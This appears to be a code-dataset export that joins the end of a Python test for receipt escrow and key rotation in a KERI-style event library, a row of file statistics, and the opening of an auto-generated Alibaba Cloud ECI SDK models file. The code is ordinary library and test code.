rsrdr = eventing.incept(keys=[verfer.qb64 for verfer in rverfers],
sith=rsith,
nxt=coring.Nexter(sith=rsith,
digs=[diger.qb64 for diger in rdigers]).qb64,
code=coring.MtrDex.Blake3_256)
rpre = rsrdr.ked["i"]
ricpdig = rsrdr.dig
mgr.move(old=rverfers[0].qb64, new=rpre) # move receipter key pair label to prefix
rsigers = mgr.sign(ser=rsrdr.raw, verfers=rverfers)
msg = bytearray(rsrdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(rsigers))
msg.extend(counter.qb64b)
for siger in rsigers:
msg.extend(siger.qb64b)
ricpmsg = msg
# create transferable receipt of inception message
seal = eventing.SealEvent(i=rpre,
s=rsrdr.ked["s"],
d=rsrdr.dig)
reserder = eventing.receipt(pre=pre, sn=0, dig=icpdig)
# sign event not receipt
resigers = mgr.sign(ser=srdr.raw, verfers=rverfers)
rcticpmsg = eventing.messagize(serder=reserder, sigers=resigers, seal=seal)
# Process receipt by kvy
psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
# kvy.process(ims=bytearray(rcticpmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre (receipted)
assert rpre not in kvy.kevers # no events yet for rpre (receipter)
escrows = kvy.db.getVres(dbing.snKey(pre, 0)) # so escrowed receipts
assert len(escrows) == 3
diger, sprefixer, sseqner, sdiger, siger = eventing.deTransReceiptQuintuple(escrows[0])
assert diger.qb64 == srdr.dig
assert sprefixer.qb64 == rpre
assert sseqner.sn == 0
assert sdiger.qb64 == rsrdr.dig
assert siger.qb64 == resigers[0].qb64
# create interaction event
srdr = eventing.interact(pre=pre, dig=icpdig, sn=1, data=[])
ixndig = srdr.dig
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
ixnmsg = msg
# Create rotation event of receipter
# get current keys as verfers and next digests as digers
rverfers, rdigers, cst, nst = mgr.rotate(pre=rpre, count=3, temp=True)
rsrdr = eventing.rotate(pre=rpre,
keys=[verfer.qb64 for verfer in rverfers],
sith=rsith,
dig=ricpdig,
nxt=coring.Nexter(sith=rsith,
digs=[diger.qb64 for diger in rdigers]).qb64,
sn=1,
data=[])
rrotdig = rsrdr.dig
rsigers = mgr.sign(ser=rsrdr.raw, verfers=rverfers)
msg = bytearray(rsrdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(rsigers))
msg.extend(counter.qb64b)
for siger in rsigers:
msg.extend(siger.qb64b)
rrotmsg = msg
# create receipt(s) of interaction message with receipter rotation message
# create chit receipt(s) of interaction message
seal = eventing.SealEvent(i=rpre,
s=rsrdr.ked["s"],
d=rsrdr.dig)
reserder = eventing.receipt(pre=pre, sn=1, dig=ixndig)
# sign event not receipt
resigers = mgr.sign(ser=srdr.raw, verfers=rverfers)
rctixnmsg = eventing.messagize(serder=reserder, sigers=resigers, seal=seal)
# Process receipt by kvy
psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctixnmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre
assert rpre not in kvy.kevers # no events yet for rpre (receipter)
escrows = kvy.db.getVres(dbing.snKey(pre, 1)) # so escrowed receipts
assert len(escrows) == 3
diger, sprefixer, sseqner, sdiger, siger = eventing.deTransReceiptQuintuple(escrows[0])
assert diger.qb64 == srdr.dig
assert sprefixer.qb64 == rpre
assert sseqner.sn == 1
assert sdiger.qb64 == rsrdr.dig
assert siger.qb64 == resigers[0].qb64
# Create rotation event or receipted
# get current keys as verfers and next digests as digers
sith = nxtsith # rotate so nxtsith is now current sith and need new nextsith
# 2 of first 3 and 1 of last 2
nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
assert cst == sith
assert nst == nxtsith
srdr = eventing.rotate(pre=pre,
keys=[verfer.qb64 for verfer in verfers],
sith=sith,
dig=ixndig,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
sn=2,
data=[])
rotdig = srdr.dig
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
rotmsg = msg
# create receipt(s) of rotation message with rotation message of receipter
# create chit receipt(s) of interaction message
seal = eventing.SealEvent(i=rpre,
s= rsrdr.ked["s"],
d=rsrdr.dig)
reserder = eventing.receipt(pre=pre, sn=2, dig=rotdig)
# sign event not receipt
resigers = mgr.sign(ser=srdr.raw, verfers=rverfers)
rctrotmsg = eventing.messagize(serder=reserder, sigers=resigers, seal=seal)
# Process receipt by kvy
psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctrotmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre
assert rpre not in kvy.kevers # no events yet for rpre (receipter)
escrows = kvy.db.getVres(dbing.snKey(pre, 2)) # so escrowed receipts
assert len(escrows) == 3
diger, sprefixer, sseqner, sdiger, siger = eventing.deTransReceiptQuintuple(escrows[0])
assert diger.qb64 == srdr.dig
assert sprefixer.qb64 == rpre
assert sseqner.sn == 1
assert sdiger.qb64 == rsrdr.dig
assert siger.qb64 == resigers[0].qb64
# Process out of unverified but stale escrow set Timeout to 0
kvy.TimeoutVRE = 0 # forces all escrows to be stale
time.sleep(0.001)
kvy.processEscrowUnverTrans()
assert pre not in kvy.kevers # key state not updated
assert rpre not in kvy.kevers # key state not updated for receipter
# check escrows removed
assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 0
assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 0
assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 0
# Now reset timeout so not zero and resend receipts to reload escrow
kvy.TimeoutVRE = 3600
# Process receipt by kvy
psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
# kvy.process(ims=bytearray(rcticpmsg)) # process local copy of msg
psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctixnmsg)) # process local copy of msg
psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctrotmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre
assert rpre not in kvy.kevers # no events yet for rpre (receipter)
# check escrows are back
assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 3
assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3
# apply inception msg to Kevery to process
psr.parse(ims=bytearray(icpmsg), kvy=kvy)
# kvy.process(ims=bytearray(icpmsg)) # process local copy of msg
assert pre in kvy.kevers # event accepted
kvr = kvy.kevers[pre]
assert kvr.serder.dig == icpdig # key state updated so event was validated
assert kvr.sn == 0 # key state successfully updated
# apply ixn msg to Kevery to process
psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(ixnmsg)) # process local copy of msg
assert kvr.serder.dig == ixndig # key state updated so event was validated
assert kvr.sn == 1 # key state successfully updated
# apply rotation msg to Kevery to process
psr.parse(ims=bytearray(rotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rotmsg)) # process local copy of msg
assert kvr.serder.dig == rotdig # key state updated so event was validated
assert kvr.sn == 2 # key state successfully updated
# check escrows have not changed
assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 3
assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3
# verify Kevery process unverified trans receipt escrow
kvy.processEscrowUnverTrans()
# check escrows have not changed because no receipter events
assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 3
assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3
# apply inception msg of receipter to Kevery to process
psr.parse(ims=bytearray(ricpmsg), kvy=kvy)
# kvy.process(ims=bytearray(ricpmsg)) # process local copy of msg
assert rpre in kvy.kevers # rpre (receipter) accepted
rkvr = kvy.kevers[rpre]
assert rkvr.serder.dig == ricpdig # key state updated so event was validated
assert rkvr.sn == 0 # key state successfully updated
# verify Kevery process unverified trans receipt escrow
kvy.processEscrowUnverTrans()
# check escrows have changed for receipts by receipter inception
assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 0
assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 3
assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 3
# apply rotation msg of receipter to Kevery to process
psr.parse(ims=bytearray(rrotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rrotmsg)) # process local copy of msg
assert rkvr.serder.dig == rrotdig # key state updated so event was validated
assert rkvr.sn == 1 # key state successfully updated
# verify Kevery process unverified trans receipt escrow
kvy.processEscrowUnverTrans()
# check escrows have changed for receipts by receipter inception
assert len(kvy.db.getVres(dbing.snKey(pre, 0))) == 0
assert len(kvy.db.getVres(dbing.snKey(pre, 1))) == 0
assert len(kvy.db.getVres(dbing.snKey(pre, 2))) == 0
# verify receipts
receipts = kvy.db.getVrcs(dbing.dgKey(pre, icpdig))
assert len(receipts) == 3
rctPrefixer, rctSeqner, rctDiger, rctSiger = eventing.deTransReceiptQuadruple(receipts[0])
assert rctPrefixer.qb64 == rpre
assert rctSeqner.sn == 0
assert rctDiger.qb64 == ricpdig
receipts = kvy.db.getVrcs(dbing.dgKey(pre, ixndig))
assert len(receipts) == 3
rctPrefixer, rctSeqner, rctDiger, rctSiger = eventing.deTransReceiptQuadruple(receipts[0])
assert rctPrefixer.qb64 == rpre
assert rctSeqner.sn == 1
assert rctDiger.qb64 == rrotdig
receipts = kvy.db.getVrcs(dbing.dgKey(pre, rotdig))
assert len(receipts) == 3
rctPrefixer, rctSeqner, rctDiger, rctSiger = eventing.deTransReceiptQuadruple(receipts[0])
assert rctPrefixer.qb64 == rpre
assert rctSeqner.sn == 1
assert rctDiger.qb64 == rrotdig
assert not os.path.exists(ks.path)
assert not os.path.exists(db.path)
"""End Test"""
if __name__ == "__main__":
test_out_of_order_escrow()
| 43.283019
| 109
| 0.596096
| 7,740
| 61,938
| 4.765375
| 0.052067
| 0.031884
| 0.022205
| 0.02657
| 0.906599
| 0.890196
| 0.873251
| 0.857418
| 0.850531
| 0.837843
| 0
| 0.024822
| 0.302722
| 61,938
| 1,430
| 110
| 43.313287
| 0.829212
| 0.234493
| 0
| 0.843478
| 0
| 0
| 0.009182
| 0
| 0
| 0
| 0
| 0
| 0.296739
| 1
| 0.005435
| false
| 0
| 0.009783
| 0
| 0.015217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c51c29688243f35154936b4f80e55c6e63eb8550
| 373,938
|
py
|
Python
|
eci-20180808/python/alibabacloud_eci20180808/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
eci-20180808/python/alibabacloud_eci20180808/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
eci-20180808/python/alibabacloud_eci20180808/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
class DescribeRegionsRequest(TeaModel):
def __init__(self, region_id=None):
self.region_id = region_id
def validate(self):
pass
def to_map(self):
result = {}
result['RegionId'] = self.region_id
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
return self
class DescribeRegionsResponse(TeaModel):
def __init__(self, request_id=None, regions=None):
self.request_id = request_id
self.regions = []
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.regions, 'regions')
if self.regions:
for k in self.regions:
if k :
k.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['Regions'] = []
if self.regions is not None:
for k in self.regions:
result['Regions'].append(k.to_map() if k else None)
else:
result['Regions'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.regions = []
if map.get('Regions') is not None:
for k in map.get('Regions'):
temp_model = DescribeRegionsResponseRegions()
temp_model = temp_model.from_map(k)
self.regions.append(temp_model)
else:
self.regions = None
return self
class DescribeRegionsResponseRegions(TeaModel):
def __init__(self, region_id=None, region_endpoint=None, zones=None):
self.region_id = region_id
self.region_endpoint = region_endpoint
self.zones = []
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.region_endpoint, 'region_endpoint')
self.validate_required(self.zones, 'zones')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['RegionEndpoint'] = self.region_endpoint
result['Zones'] = []
if self.zones is not None:
for k in self.zones:
result['Zones'].append(k)
else:
result['Zones'] = None
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.region_endpoint = map.get('RegionEndpoint')
self.zones = []
if map.get('Zones') is not None:
for k in map.get('Zones'):
self.zones.append(k)
else:
self.zones = None
return self
class DescribeImageCachesRequest(TeaModel):
def __init__(self, region_id=None, image_cache_id=None, image_cache_name=None, snapshot_id=None, image=None):
self.region_id = region_id
self.image_cache_id = image_cache_id
self.image_cache_name = image_cache_name
self.snapshot_id = snapshot_id
self.image = image
def validate(self):
self.validate_required(self.region_id, 'region_id')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ImageCacheId'] = self.image_cache_id
result['ImageCacheName'] = self.image_cache_name
result['SnapshotId'] = self.snapshot_id
result['Image'] = self.image
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.image_cache_id = map.get('ImageCacheId')
self.image_cache_name = map.get('ImageCacheName')
self.snapshot_id = map.get('SnapshotId')
self.image = map.get('Image')
return self
class DescribeImageCachesResponse(TeaModel):
def __init__(self, request_id=None, image_caches=None):
self.request_id = request_id
self.image_caches = []
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.image_caches, 'image_caches')
if self.image_caches:
for k in self.image_caches:
if k :
k.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['ImageCaches'] = []
if self.image_caches is not None:
for k in self.image_caches:
result['ImageCaches'].append(k.to_map() if k else None)
else:
result['ImageCaches'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.image_caches = []
if map.get('ImageCaches') is not None:
for k in map.get('ImageCaches'):
temp_model = DescribeImageCachesResponseImageCaches()
temp_model = temp_model.from_map(k)
self.image_caches.append(temp_model)
else:
self.image_caches = None
return self
class DescribeImageCachesResponseImageCachesEvents(TeaModel):
def __init__(self, count=None, type=None, name=None, message=None, first_timestamp=None, last_timestamp=None):
self.count = count
self.type = type
self.name = name
self.message = message
self.first_timestamp = first_timestamp
self.last_timestamp = last_timestamp
def validate(self):
self.validate_required(self.count, 'count')
self.validate_required(self.type, 'type')
self.validate_required(self.name, 'name')
self.validate_required(self.message, 'message')
self.validate_required(self.first_timestamp, 'first_timestamp')
self.validate_required(self.last_timestamp, 'last_timestamp')
def to_map(self):
result = {}
result['Count'] = self.count
result['Type'] = self.type
result['Name'] = self.name
result['Message'] = self.message
result['FirstTimestamp'] = self.first_timestamp
result['LastTimestamp'] = self.last_timestamp
return result
def from_map(self, map={}):
self.count = map.get('Count')
self.type = map.get('Type')
self.name = map.get('Name')
self.message = map.get('Message')
self.first_timestamp = map.get('FirstTimestamp')
self.last_timestamp = map.get('LastTimestamp')
return self
class DescribeImageCachesResponseImageCaches(TeaModel):
def __init__(self, container_group_id=None, image_cache_id=None, image_cache_name=None, snapshot_id=None, progress=None, status=None, expire_date_time=None, creation_time=None, region_id=None, events=None, images=None):
self.container_group_id = container_group_id
self.image_cache_id = image_cache_id
self.image_cache_name = image_cache_name
self.snapshot_id = snapshot_id
self.progress = progress
self.status = status
self.expire_date_time = expire_date_time
self.creation_time = creation_time
self.region_id = region_id
self.events = []
self.images = []
def validate(self):
self.validate_required(self.container_group_id, 'container_group_id')
self.validate_required(self.image_cache_id, 'image_cache_id')
self.validate_required(self.image_cache_name, 'image_cache_name')
self.validate_required(self.snapshot_id, 'snapshot_id')
self.validate_required(self.progress, 'progress')
self.validate_required(self.status, 'status')
self.validate_required(self.expire_date_time, 'expire_date_time')
self.validate_required(self.creation_time, 'creation_time')
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.events, 'events')
if self.events:
for k in self.events:
if k :
k.validate()
self.validate_required(self.images, 'images')
def to_map(self):
result = {}
result['ContainerGroupId'] = self.container_group_id
result['ImageCacheId'] = self.image_cache_id
result['ImageCacheName'] = self.image_cache_name
result['SnapshotId'] = self.snapshot_id
result['Progress'] = self.progress
result['Status'] = self.status
result['ExpireDateTime'] = self.expire_date_time
result['CreationTime'] = self.creation_time
result['RegionId'] = self.region_id
result['Events'] = []
if self.events is not None:
for k in self.events:
result['Events'].append(k.to_map() if k else None)
else:
result['Events'] = None
result['Images'] = []
if self.images is not None:
for k in self.images:
result['Images'].append(k)
else:
result['Images'] = None
return result
def from_map(self, map={}):
self.container_group_id = map.get('ContainerGroupId')
self.image_cache_id = map.get('ImageCacheId')
self.image_cache_name = map.get('ImageCacheName')
self.snapshot_id = map.get('SnapshotId')
self.progress = map.get('Progress')
self.status = map.get('Status')
self.expire_date_time = map.get('ExpireDateTime')
self.creation_time = map.get('CreationTime')
self.region_id = map.get('RegionId')
self.events = []
if map.get('Events') is not None:
for k in map.get('Events'):
temp_model = DescribeImageCachesResponseImageCachesEvents()
temp_model = temp_model.from_map(k)
self.events.append(temp_model)
else:
self.events = None
self.images = []
if map.get('Images') is not None:
for k in map.get('Images'):
self.images.append(k)
else:
self.images = None
return self
class DeleteImageCacheRequest(TeaModel):
def __init__(self, region_id=None, image_cache_id=None, client_token=None):
self.region_id = region_id
self.image_cache_id = image_cache_id
self.client_token = client_token
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.image_cache_id, 'image_cache_id')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ImageCacheId'] = self.image_cache_id
result['ClientToken'] = self.client_token
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.image_cache_id = map.get('ImageCacheId')
self.client_token = map.get('ClientToken')
return self
class DeleteImageCacheResponse(TeaModel):
def __init__(self, request_id=None):
self.request_id = request_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
return self
class CreateImageCacheRequest(TeaModel):
def __init__(self, region_id=None, zone_id=None, security_group_id=None, v_switch_id=None, image_cache_name=None, image_registry_credential=None, eip_instance_id=None, resource_group_id=None, client_token=None, image=None, image_cache_size=None, retention_days=None):
self.region_id = region_id
self.zone_id = zone_id
self.security_group_id = security_group_id
self.v_switch_id = v_switch_id
self.image_cache_name = image_cache_name
self.image_registry_credential = []
self.eip_instance_id = eip_instance_id
self.resource_group_id = resource_group_id
self.client_token = client_token
self.image = []
self.image_cache_size = image_cache_size
self.retention_days = retention_days
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.security_group_id, 'security_group_id')
self.validate_required(self.v_switch_id, 'v_switch_id')
self.validate_required(self.image_cache_name, 'image_cache_name')
if self.image_registry_credential:
for k in self.image_registry_credential:
if k :
k.validate()
self.validate_required(self.image, 'image')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ZoneId'] = self.zone_id
result['SecurityGroupId'] = self.security_group_id
result['VSwitchId'] = self.v_switch_id
result['ImageCacheName'] = self.image_cache_name
result['ImageRegistryCredential'] = []
if self.image_registry_credential is not None:
for k in self.image_registry_credential:
result['ImageRegistryCredential'].append(k.to_map() if k else None)
else:
result['ImageRegistryCredential'] = None
result['EipInstanceId'] = self.eip_instance_id
result['ResourceGroupId'] = self.resource_group_id
result['ClientToken'] = self.client_token
result['Image'] = []
if self.image is not None:
for k in self.image:
result['Image'].append(k)
else:
result['Image'] = None
result['ImageCacheSize'] = self.image_cache_size
result['RetentionDays'] = self.retention_days
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.zone_id = map.get('ZoneId')
self.security_group_id = map.get('SecurityGroupId')
self.v_switch_id = map.get('VSwitchId')
self.image_cache_name = map.get('ImageCacheName')
self.image_registry_credential = []
if map.get('ImageRegistryCredential') is not None:
for k in map.get('ImageRegistryCredential'):
temp_model = CreateImageCacheRequestImageRegistryCredential()
temp_model = temp_model.from_map(k)
self.image_registry_credential.append(temp_model)
else:
self.image_registry_credential = None
self.eip_instance_id = map.get('EipInstanceId')
self.resource_group_id = map.get('ResourceGroupId')
self.client_token = map.get('ClientToken')
self.image = []
if map.get('Image') is not None:
for k in map.get('Image'):
self.image.append(k)
else:
self.image = None
self.image_cache_size = map.get('ImageCacheSize')
self.retention_days = map.get('RetentionDays')
return self
class CreateImageCacheRequestImageRegistryCredential(TeaModel):
def __init__(self, server=None, user_name=None, password=None):
self.server = server
self.user_name = user_name
self.password = password
def validate(self):
self.validate_required(self.server, 'server')
self.validate_required(self.user_name, 'user_name')
self.validate_required(self.password, 'password')
def to_map(self):
result = {}
result['Server'] = self.server
result['UserName'] = self.user_name
result['Password'] = self.password
return result
def from_map(self, map={}):
self.server = map.get('Server')
self.user_name = map.get('UserName')
self.password = map.get('Password')
return self
class CreateImageCacheResponse(TeaModel):
def __init__(self, request_id=None, image_cache_id=None, container_group_id=None):
self.request_id = request_id
self.image_cache_id = image_cache_id
self.container_group_id = container_group_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.image_cache_id, 'image_cache_id')
self.validate_required(self.container_group_id, 'container_group_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['ImageCacheId'] = self.image_cache_id
result['ContainerGroupId'] = self.container_group_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.image_cache_id = map.get('ImageCacheId')
self.container_group_id = map.get('ContainerGroupId')
return self
class DescribeMultiContainerGroupMetricRequest(TeaModel):
def __init__(self, region_id=None, container_group_ids=None, resource_group_id=None, metric_type=None):
self.region_id = region_id
self.container_group_ids = container_group_ids
self.resource_group_id = resource_group_id
self.metric_type = metric_type
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.container_group_ids, 'container_group_ids')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupIds'] = self.container_group_ids
result['ResourceGroupId'] = self.resource_group_id
result['MetricType'] = self.metric_type
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_ids = map.get('ContainerGroupIds')
self.resource_group_id = map.get('ResourceGroupId')
self.metric_type = map.get('MetricType')
return self
class DescribeMultiContainerGroupMetricResponse(TeaModel):
def __init__(self, request_id=None, monitor_datas=None):
self.request_id = request_id
self.monitor_datas = []
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.monitor_datas, 'monitor_datas')
if self.monitor_datas:
for k in self.monitor_datas:
if k :
k.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['MonitorDatas'] = []
if self.monitor_datas is not None:
for k in self.monitor_datas:
result['MonitorDatas'].append(k.to_map() if k else None)
else:
result['MonitorDatas'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.monitor_datas = []
if map.get('MonitorDatas') is not None:
for k in map.get('MonitorDatas'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatas()
temp_model = temp_model.from_map(k)
self.monitor_datas.append(temp_model)
else:
self.monitor_datas = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersCPU(TeaModel):
def __init__(self, limit=None, load=None, usage_core_nano_seconds=None, usage_nano_cores=None):
self.limit = limit
self.load = load
self.usage_core_nano_seconds = usage_core_nano_seconds
self.usage_nano_cores = usage_nano_cores
def validate(self):
self.validate_required(self.limit, 'limit')
self.validate_required(self.load, 'load')
self.validate_required(self.usage_core_nano_seconds, 'usage_core_nano_seconds')
self.validate_required(self.usage_nano_cores, 'usage_nano_cores')
def to_map(self):
result = {}
result['Limit'] = self.limit
result['Load'] = self.load
result['UsageCoreNanoSeconds'] = self.usage_core_nano_seconds
result['UsageNanoCores'] = self.usage_nano_cores
return result
def from_map(self, map={}):
self.limit = map.get('Limit')
self.load = map.get('Load')
self.usage_core_nano_seconds = map.get('UsageCoreNanoSeconds')
self.usage_nano_cores = map.get('UsageNanoCores')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersMemory(TeaModel):
def __init__(self, available_bytes=None, usage_bytes=None, cache=None, working_set=None, rss=None):
self.available_bytes = available_bytes
self.usage_bytes = usage_bytes
self.cache = cache
self.working_set = working_set
self.rss = rss
def validate(self):
self.validate_required(self.available_bytes, 'available_bytes')
self.validate_required(self.usage_bytes, 'usage_bytes')
self.validate_required(self.cache, 'cache')
self.validate_required(self.working_set, 'working_set')
self.validate_required(self.rss, 'rss')
def to_map(self):
result = {}
result['AvailableBytes'] = self.available_bytes
result['UsageBytes'] = self.usage_bytes
result['Cache'] = self.cache
result['WorkingSet'] = self.working_set
result['Rss'] = self.rss
return result
def from_map(self, map={}):
self.available_bytes = map.get('AvailableBytes')
self.usage_bytes = map.get('UsageBytes')
self.cache = map.get('Cache')
self.working_set = map.get('WorkingSet')
self.rss = map.get('Rss')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainers(TeaModel):
def __init__(self, name=None, _cpu=None, memory=None):
self.name = name
self._cpu = _cpu
self.memory = memory
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self._cpu, '_cpu')
if self._cpu:
self._cpu.validate()
self.validate_required(self.memory, 'memory')
if self.memory:
self.memory.validate()
def to_map(self):
result = {}
result['Name'] = self.name
if self._cpu is not None:
result['CPU'] = self._cpu.to_map()
else:
result['CPU'] = None
if self.memory is not None:
result['Memory'] = self.memory.to_map()
else:
result['Memory'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
if map.get('CPU') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersCPU()
self._cpu = temp_model.from_map(map['CPU'])
else:
self._cpu = None
if map.get('Memory') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainersMemory()
self.memory = temp_model.from_map(map['Memory'])
else:
self.memory = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsCPU(TeaModel):
def __init__(self, limit=None, load=None, usage_core_nano_seconds=None, usage_nano_cores=None):
self.limit = limit
self.load = load
self.usage_core_nano_seconds = usage_core_nano_seconds
self.usage_nano_cores = usage_nano_cores
def validate(self):
self.validate_required(self.limit, 'limit')
self.validate_required(self.load, 'load')
self.validate_required(self.usage_core_nano_seconds, 'usage_core_nano_seconds')
self.validate_required(self.usage_nano_cores, 'usage_nano_cores')
def to_map(self):
result = {}
result['Limit'] = self.limit
result['Load'] = self.load
result['UsageCoreNanoSeconds'] = self.usage_core_nano_seconds
result['UsageNanoCores'] = self.usage_nano_cores
return result
def from_map(self, map={}):
self.limit = map.get('Limit')
self.load = map.get('Load')
self.usage_core_nano_seconds = map.get('UsageCoreNanoSeconds')
self.usage_nano_cores = map.get('UsageNanoCores')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsMemory(TeaModel):
def __init__(self, available_bytes=None, usage_bytes=None, cache=None, working_set=None, rss=None):
self.available_bytes = available_bytes
self.usage_bytes = usage_bytes
self.cache = cache
self.working_set = working_set
self.rss = rss
def validate(self):
self.validate_required(self.available_bytes, 'available_bytes')
self.validate_required(self.usage_bytes, 'usage_bytes')
self.validate_required(self.cache, 'cache')
self.validate_required(self.working_set, 'working_set')
self.validate_required(self.rss, 'rss')
def to_map(self):
result = {}
result['AvailableBytes'] = self.available_bytes
result['UsageBytes'] = self.usage_bytes
result['Cache'] = self.cache
result['WorkingSet'] = self.working_set
result['Rss'] = self.rss
return result
def from_map(self, map={}):
self.available_bytes = map.get('AvailableBytes')
self.usage_bytes = map.get('UsageBytes')
self.cache = map.get('Cache')
self.working_set = map.get('WorkingSet')
self.rss = map.get('Rss')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetworkInterfaces(TeaModel):
def __init__(self, tx_bytes=None, rx_bytes=None, tx_errors=None, rx_errors=None, name=None):
self.tx_bytes = tx_bytes
self.rx_bytes = rx_bytes
self.tx_errors = tx_errors
self.rx_errors = rx_errors
self.name = name
def validate(self):
self.validate_required(self.tx_bytes, 'tx_bytes')
self.validate_required(self.rx_bytes, 'rx_bytes')
self.validate_required(self.tx_errors, 'tx_errors')
self.validate_required(self.rx_errors, 'rx_errors')
self.validate_required(self.name, 'name')
def to_map(self):
result = {}
result['TxBytes'] = self.tx_bytes
result['RxBytes'] = self.rx_bytes
result['TxErrors'] = self.tx_errors
result['RxErrors'] = self.rx_errors
result['Name'] = self.name
return result
def from_map(self, map={}):
self.tx_bytes = map.get('TxBytes')
self.rx_bytes = map.get('RxBytes')
self.tx_errors = map.get('TxErrors')
self.rx_errors = map.get('RxErrors')
self.name = map.get('Name')
return self
